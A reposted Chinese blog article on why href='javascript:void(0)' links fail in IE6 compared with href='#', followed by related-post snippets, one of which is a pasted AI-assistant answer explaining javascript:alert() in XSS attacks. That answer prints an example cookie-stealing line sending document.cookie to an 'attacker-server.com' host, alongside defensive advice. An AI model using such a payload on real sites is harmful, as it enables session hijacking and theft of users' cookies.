关于<a href="#">与<a href="javascript:void(0);">在IE6下的问题(转载)

最新推荐文章于 2023-03-20 09:38:17 发布
转载 最新推荐文章于 2023-03-20 09:38:17 发布 · 71 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/zhentou/archive/2012/08/26/2657690.html
文章标签:

#javascript #ViewUI

本文详细解析了在IE6浏览器中,使用JavaScript中的void(0)和void(0);在超链接事件处理上的区别,并提供了在不同场景下如何正确使用的建议。包括如何避免页面整体刷新,实现无刷新的页面交互,以及如何在需要刷新页面时正确应用void(0)。通过实例代码展示在IE6、IE7、Firefox3下不同代码片段的测试结果,帮助开发者理解并解决页面交互问题。

IE6下<a href="#">与<a href="javascript:void(0);">的区别

JavaScriptAjaxIEFirefoxHTML.之前在项目,用到超链接,在ie下没有问题,但是到了ie6,居然发现点击事件不起作用, 真不可思议,以前都没注意到,后来网上搜了下,问题就出在这个void(0)上!现把网上的资料整理了下。

Html代码 
1.<a href=”javaScript:void(0)” onClick=”doSomething();”>doSomethind</a> 
<a href=”javaScript:void(0)” onClick=”doSomething();”>doSomethind</a>

 

让我们先来看看JavaScript中void(0)的含义:
JavaScript中void是一个操作符,该操作符指定要计算一个表达式但是不返回值。

void 操作符用法格式如下:

Html代码 
1.javascript:void (expression)  
2.javascript:void expression 
javascript:void (expression)
javascript:void expression

 

expression是一个要计算的 JavaScript 标准的表达式。表达式外侧的圆括号是可选的,但是写上去是一个好习惯。我们可以使用 void 操作符指定超级链接。表达式会被计算但是不会在当前文档处装入任何内容。面的代码创建了一个超级链接,当用户点击以后不会发生任何事。当用户点击链接时,void(0) 计算为 0,但在 JavaScript 上没有任何效果。

 

Html代码 
1.<a href=”javascript:void(0)”>单击此处什么也不会发生</a> 
<a href=”javascript:void(0)”>单击此处什么也不会发生</a>

也就是说,要执行某些处理,但是不整体刷新页面的情况下,可以使用void(0),但是在需要对页面进行refresh的情况下,那就要仔细了。

 

Html代码 
1.<a href=”javascript:void(document.form.submit())”> 
<a href=”javascript:void(document.form.submit())”>

其实我们可以用上面的代码,这句话会进行一次submit操作。那什么情况下用void(0)比较多呢,无刷新,当然是Ajax了,看一下Ajax的web页面的话,一般都会看到有很多的void(0),:D 所以在使用void(0)之前,最好先想一想,这个页面是否需要整体刷新。

 
Html代码 
1.<script type="text/javascript">     
2.    function goUrl(x){     
3.        window.location.href=x;     
4.    }     
5.</script>     
6. 
7.<a href="javascript:;" onclick="javascript:goUrl('http://www.sina.com');">跳转1</a> 
8.     
9.<a href="javascript:void(0);" onclick="javascript:goUrl('http://www.sina.com');">跳转2</a> 
10.     
11.<a href="javascript:void(0);" onclick="javascript:goUrl('http://www.sina.com');return false;">跳转3</a>     
12. 
13.<a href="#" onclick="javascript:goUrl('http://www.sina.com');">跳转4</a>     
14. 
15.<a href="###" onclick="javascript:goUrl('http://www.sina.com');">跳转5</a>   
<script type="text/javascript">  
    function goUrl(x){  
        window.location.href=x;  
    }  
</script>  

<a href="javascript:;" onclick="javascript:goUrl('http://www.sina.com');">跳转1</a>
  
<a href="javascript:void(0);" onclick="javascript:goUrl('http://www.sina.com');">跳转2</a>
  
<a href="javascript:void(0);" onclick="javascript:goUrl('http://www.sina.com');return false;">跳转3</a>  

<a href="#" onclick="javascript:goUrl('http://www.sina.com');">跳转4</a>  

<a href="###" onclick="javascript:goUrl('http://www.sina.com');">跳转5</a> 

测试环境IE6,IE7,Firefox 3。

跳转1和2在IE6环境下无效,3、4、5在IE6,IE7,Firefox3.01下测试均能 通过,。

跳转4和5最简洁。

关键在于<a>的href属性,空链接用"#","###"。

为了不返回网页顶端。

空链接推荐用"###"。

转载于:https://www.cnblogs.com/zhentou/archive/2012/08/26/2657690.html

[removed]void(0)是什么意思及href=#href=javascriptvoid(0)的区别
10-23
然而,`href="javascript:void(0)"` 在某些旧版本的IE浏览器中可能引发问题,如导致GIF动画停止播放。为了避免这些问题,一个更推荐的做法是使用 `href="#"` 并在链接的 `onclick` 事件中添加 `return false`,这...
IE6javascript:void(0)的诡异
编程爱好者
08-06 1797
IE6的区别 JavaScriptAjaxIEFirefoxHTML.之前在项目,用到超链接,在ie下没有问题,但是到了ie6,居然发现点击事件不起作用, 真不可思议,以前都没注意到,后来网上搜了下,问题就出在这个void(0)上!现把网上的资料整理了下。 Html
解决IEjavascript:void(0)会触发window.onbeforeunload事件
iamfafa的专栏
07-12 2279
转自:http://devilswrwr.blog.163.com/blog/static/6583867020117291041964/ 最近使用这个方法了,发现了奇异现象,最开始并不知道是这个引起的,无意中搜索到这边文章。 点击事件触发的时候(调用顺序:onclick->window.onbeforeunload->href)。 //IE javascript
ie7下<a href="javascript:;">标签不反应
weixin_34249678的博客
05-04 188
<a href="javascript:;" onclick="functionOne()"> 点击</a> <script> functionOne() {$("form").submit();} </script> 这种情况下 点击<a>标签不反应。删掉href="javascript:;" 就可以了。 删除之前的情况...
IE6javascript:void(0)不可用的解决
weixin_30443731的博客
01-07 214
<a href="javascript:void(0)" class="inp_sear_a" onclick="doSubmit();"></a> 以上写法在ie6下不起作用,改为<a href="javascript:doSubmit()" class="inp_sear_a" ></a>就可以了。 百度了一下原因: Html代码...
ie6 javascript:void(0);
日光海岸
05-19 220
http://yslove.net/2011/02/ie6-javascriptvoid0/‘ 遇到过几次这种问题,现在总结一下。 代码: &lt;a onclick="window.location.href='http://www.google.com'" href="javascript:void(0);"&gt;google&lt;/a&gt; &lt;a href="ja...
详解A标签中href=””的几种用法
12-11
而且,大多数人认为a标签最重要的作用是实现超链接,今天我刚好碰到a标签的一种写法<a></a>,所以就来整理下a标签中href的几种用法。 一、js的几种调用方法(参考总结的)  1、a href="[removed]js_method();"  这...
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link href="../static/bootstrap/css/bootstrap.min.css" rel="stylesheet"> <link href="../static/bootstrap/css/bootstrap.css" rel="stylesheet"> <script src="../static/bootstrap/js/jquery-3.3.1.min.js"></script> <script src="../static/bootstrap/js/bootstrap.min.js"></script> <link rel="icon" type="image/x-icon" href="../static/images/logo.ico"/> <link rel="stylesheet" type="text/css" href="../static/css/header.css"> <script src="../static/js/header.js" charset="utf-8"></script> <script src="../static/js/Api.js"></script> <script src="../static/layui/layui-v2.6.8/layui/layui.js" charset="utf-8"></script> <link rel="stylesheet" href="../static/layui/layui-v2.6.8/layui/css/layui.css" media="all"> <title>鹰眼电影</title> </head> <body> <!-- 导航栏 --> <div class="header navbar navbar-fixed-top"> <div class="header-top"> <div class="header-inner"> <h1> <a href="javascript:void(0)" class="logo"></a> </h1> <div class="nav"> <ul> <li><a href="javascript:void(0)">首页</a></li> <li><a href="javascript:void(0)">影院</a></li> <li><a href="javascript:void(0)">榜单</a></li> </ul> </div> <div class="app-download"> </div> <div class="user-info"> <div class="user-avatar J-login"> <ul class="layui-nav" style="background-color: #fff;"> <li class="layui-nav-item header-li" style="width:40px;" lay-unselect="" style="width: 40px;"> </li> </ul> </div> </div> <form action=""> <input name="searchMovie" class="search" type="search" maxlength="32" placeholder="找影视剧、影人、影院" autocomplete="off"> <input class="submit" type="submit" value=""> </form> </div> </div> </div> <script> var clientHeight = document.documentElement.clientHeight; window.onload = function(){ initHeader(); } </script> </body> </html>
07-03
<a class="nav-link" href="#">首页 <span class="sr-only">(current)</span></a> </li> <li class="nav-item"> <a class="nav-link" href="#">热门电影</a> </li> <li class="nav-item"> <a class="nav-link...
response.write "<td width=&#39;5%&#39; align=&#39;center&#39;><b><font size=&#39;2&#39; face=&#39;宋体&#39;><a href=""javascript:void(0);"" onclick=""openCourseware(&#39;" & materialurl & "&#39;)"">课件</font></td></tr></table>" 这个 代码在ie 浏览器中无法适配,无法使用
最新发布
08-23
response.write "<td width=&#39;5%&#39; align=&#39;center&#39;><b><font size=&#39;2&#39; face=&#39;宋体&#39;><a href=""javascript:void(0);"" onclick=""openCourseware(&#39;" & materialurl & "&#39;)"">课件</font></td></tr></table>" ``` ### ❌...
return "<a href=\"javascript:down()\"></a>改成兼容老版ie格式可以下载压缩包
04-04
<think>好的,我现在需要帮助用户解决将`<a href="javascript:down()"></a>`改为兼容老版本IE的下载链接的问题。首先,我要确认用户的需求是什么。用户希望这个链接在旧版IE(比如IE6-IE10)中能够正常触发下载功能...
javascript:void(0);用法及常见问题解析
03-20 1万+
从上面的例子也可以看出,当要执行某些处理,但是不整体刷新页面的情况下,可以使用void(0),但是在需要对页面进行refresh的情况下,那就要仔细了。表达式会被计算但是不会在当前文档处装入任何内容,void(0)计算为0,但在JavaScript上没有任何效果,也就是说的效果同的效果是一样的。那什么情况下用void(0)比较多呢,无刷新,当然是Ajax了,看一下Ajax的web页面的话,一般都会看到有很多的void(0),所以在使用void(0)之前,最好先想一想,这个页面是否需要整体刷新。
在上网时出现Javascriptvoid0)网页没有反应
热门推荐
Kelly成长之路
03-16 10万+
从上上周开始发现写优快云博客的时候网页没有反应,而且在个人分类这没有显示分类的类别,除了能进去这个页面其他的啥也操作不了。 网页左下角显示Javascriptvoid0),如图所示 后来查的问题是脚本错误,有以下几种解决方案 1、可能是浏览器不兼容首先换个浏览器试试,如果还是不行还有其他解决方案。 2、可能是注册表中没有注册JScript,需要注册如下操作 3、
javascriptvoid(0);用法及常见问题解析
一只苟延残喘的卑微蝼蚁
06-08 10万+
转载这篇文章 使用过ajax的朋友经常会见到这样的代码:here,这里面的void是一个操作符,该操作符指定要计算一个表达式但是不返回值。javascript:void(0) 在某些情况下会有浏览器不兼容的bug。下面我们先来看下javascript:void(0) 的基础介绍及用法,然后再来看使用它会出现什么问题,该怎么解决。 提示:在学习一下内容之前,你可以先通过javascript:vo...
关于火狐和IEhref="javascript:void(0)"兼容性的问题
殇沫流年的专栏
04-11 1万+
火狐和IEhref="javascript:void(0) 会弹出空白页 经过排查,发现是href="javascript:void(0);"导致的问题,本来javascript:void(0);的用处是不用整体刷新网页且返回一个空值,但这儿由于DOM本身的冒泡事件所以会最后执行HREF属性内的javascript:void(0);导致执行函数返回了一个空值,所以覆盖掉了前面正常执
请慎用javascript:void(0),尤其是在坑爹的IE6
a214919447的博客
06-05 1499
原文链接 你想要一个A标签,但是其href属性并不是你想要的,也就是说其实你只想要个样式而已。于是你将href置空,或者指向“#”,但是很快你发现,这样做是有些小问题的,于是你又查阅资料,终于邂逅了javascript:void(0)。   你以为终于万事大吉,可以顺利解决问题,却在上线前的测试中郁闷地发现,我勒个去,竟然在行将就木的IE6中不好使!   好吧,你再接再厉又去goog
javascript 的button onclick事件不起作用的解决方法
weixin_34088598的博客
01-08 7941
在项目中遇到个问题:servlet向前端返回如下按钮,当course_ID为数字是onclick事件正常,但当course_ID含有字母时onclick事件就不起作用。网上找了很多方法都不管用,最后自己摸索到了一个方法,解决了问题。 【权记于此】 有问题者:         out.print("&lt;td&gt;&lt;input type='button' id='tb_delete_...
老生常谈IE兼容性:ie6 javascript:void(0)IE7 input透明、IE8 jquery动态加载css
编程手札
11-29 9102
这年头依旧有人坚守IE6阵营,为什么呢?人家客户说单位以前系统必须用IE6没办法升级,这理由还真充分! 一、IE6javascript:void(0)的支持      问题:a href=”javaScript:void(0)” onclick=”doSomething();”>click mea>,发现点击事件不起作用。原因是和IE6的事件冒泡处理方法有关,网上一大堆讨论。      
javascript:;javascript:void(0)使用介绍
weixin_30257433的博客
12-09 1265
有时候我们在编写js过程中,需要触发事件而不需要返回值,那么就可能需要这样的写法。 注:以下代码未经全面测试,但每一种方法可能会出现的情况都基本做了说明。在做页面时,如果想做一个链接点击后不做任何事情,或者响应点击而完成其他事情,可以设置其属性 href = "#",但是,这样会有一个问题,就是当页面有滚动条时,点击后会返回到页面顶端,用户体验不好。 目前有如下几种解决办法: ...
<a href=javascript:alert()>这个在XSS里是什么意思
07-24
<think>首先,用户的问题是:“我想理解XSS攻击中JavaScript代码的用途 请问XSS攻击中使用javascript:alert()的作用”。这是关于XSS(跨站脚本攻击)中JavaScript代码的用途,特别是使用javascript:alert()的作用。 我需要参考提供的引用: - 引用[1]:解释了XSS攻击的定义,攻击者注入恶意脚本(如JavaScript)来获取用户信息或执行恶意操作。 - 引用[2]:展示了一个具体的XSS例子,其中使用new Image().src = &#39;javascript:alert(1)&#39;; 在IE6下执行alert。 - 引用[3]:讨论了javascript:伪协议,并提到void运算符。 用户的问题聚焦于javascript:alert()的作用。在XSS攻击中,alert()通常用作一个简单的演示或测试工具,来确认漏洞的存在。但实际攻击中,它可能被替换为更恶意的代码。 关键点: - javascript:alert() 在XSS中常用于证明漏洞:当alert()弹出时,表明脚本已成功执行。 - 在实际攻击中,攻击者可能使用类似机制执行更危险的代码,如窃取cookies、重定向用户等。 - 引用[2]中的例子显示,通过设置img.src为javascript:alert(1),在IE6中执行了alert。 我的回答需要: - 使用中文回答。 - 结构清晰,逐步解释问题。 - 遵循系统级指令:行内数学表达式用$...$,独立公式用$$...$$(但这里可能不需要数学公式)。 - 生成相关问题。 - 在引用段落末尾添加引用标识。 回答结构: 1. **解释XSS攻击的基本概念**:简要回顾XSS是什么。 2. **解释JavaScript在XSS中的作用**:攻击者注入JavaScript来执行恶意操作。 3. **具体到javascript:alert()**:说明alert()的常见用途,如演示漏洞、测试或作为攻击的一部分。 4. **引用中的例子**:提到引用[2]中的例子,说明如何被利用。 5. **潜在风险**:强调alert()只是简单例子,实际攻击更严重。 6. **生成相关问题**:在末尾添加几个相关问题。 确保语言自然、易懂。 生成相关问题: 1. XSS攻击中如何防止javascript:伪协议的利用? 2. 除了alert(),XSS攻击中常见的恶意JavaScript代码有哪些? 3. 如何检测和防御XSS漏洞? 最后,添加引用标识:在引用内容末尾添加[^1]、[^2]等。</think>### XSS攻击中JavaScript代码的用途及javascript:alert()的作用 XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在目标网站中注入恶意JavaScript代码,来窃取用户敏感信息(如cookies、会话令牌)或在用户浏览器中执行未授权操作。这种攻击利用了浏览器对客户端脚本的信任,导致用户数据泄露或系统被控制[^1]。下面,我将逐步解释JavaScript在XSS中的作用,并重点说明javascript:alert()的常见用途。 #### 1. **JavaScript在XSS攻击中的核心作用** - JavaScript是XSS攻击的主要载体,因为它是现代Web浏览器支持的标准脚本语言。攻击者注入的JavaScript代码可以: - **窃取用户数据**:例如,读取cookies或表单输入,并将其发送到攻击者的服务器。 - **操纵页面内容**:修改DOM元素,如重定向用户到钓鱼网站或显示虚假登录框。 - **执行恶意操作**:例如,利用浏览器的API发起进一步攻击,如发起CSRF(跨站请求伪造)请求。 - 这些操作通常发生在用户不知情的情况下,因为脚本在受害者浏览器中直接运行[^1]。 #### 2. **javascript:alert()的具体作用** javascript:alert()JavaScript中一个简单的弹窗函数,常用于XSS攻击的演示或测试阶段。它的作用包括: - **漏洞确认演示**:攻击者或安全研究人员使用alert()来快速验证XSS漏洞的存在。例如,当注入的代码如javascript:alert(1)成功弹出警告框时,表明脚本已执行,证明目标网站存在安全缺陷。这类似于一个“概念验证”,帮助识别可被利用的点[^2][^3]。 - **简化攻击测试**:在实际攻击中,alert()常作为更复杂恶意代码的“占位符”。因为它简单无害,攻击者先用它测试注入点(如URL参数或表单字段),确认可行后再替换为实际恶意代码(如窃取cookies的脚本)。 - **利用浏览器特性**:在某些旧版浏览器(如IE6)中,javascript:伪协议允许在非脚本上下文(如图片的src属性)执行代码。例如,引用[2]中的例子:`new Image().src = &#39;javascript:alert(1)&#39;;`,这会导致在IE6下弹出alert窗口,证实了漏洞[^2][^3]。 - **教育意识提升**:在安全培训中,alert()被广泛用于演示XSS原理,因为它直观地展示了脚本注入的后果,帮助开发者理解风险。 然而,在实际恶意攻击中,alert()很少被直接用于破坏,因为它仅显示信息而不执行有害操作。攻击者通常会替换为更危险的代码,例如: ```javascript // 实际恶意代码示例:窃取用户cookies new Image().src = &#39;http://attacker-server.com/steal?data=&#39; + document.cookie; ``` #### 3. **潜在风险防御建议** - **风险**:尽管alert()本身无害,但它暴露了系统漏洞。如果未修复,攻击者可注入如数据窃取或会话劫持的脚本,导致严重安全事件[^1][^2]。 - **防御方法**: - **输入过滤输出编码**:对所有用户输入进行严格验证(如移除<script>标签),并在输出时对特殊字符(如<, >, &)进行HTML编码。 - **限制伪协议**:避免在属性(如src或href)中使用javascript:伪协议。引用[2]建议,强制属性以http://或https://开头,防止代码注入[^2]。 - **使用内容安全策略(CSP)**:通过HTTP头部设置CSP,限制脚本来源,只允许可信域执行JavaScript。 - **定期安全测试**:使用工具(如OWASP ZAP)扫描XSS漏洞,并及时修复。 总之,javascript:alert()在XSS中主要作为漏洞的“指示灯”,帮助识别和演示问题,但其背后代表的是更广泛的安全威胁。开发者应重视输入验证和编码实践,以阻断恶意脚本的执行[^1][^2][^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值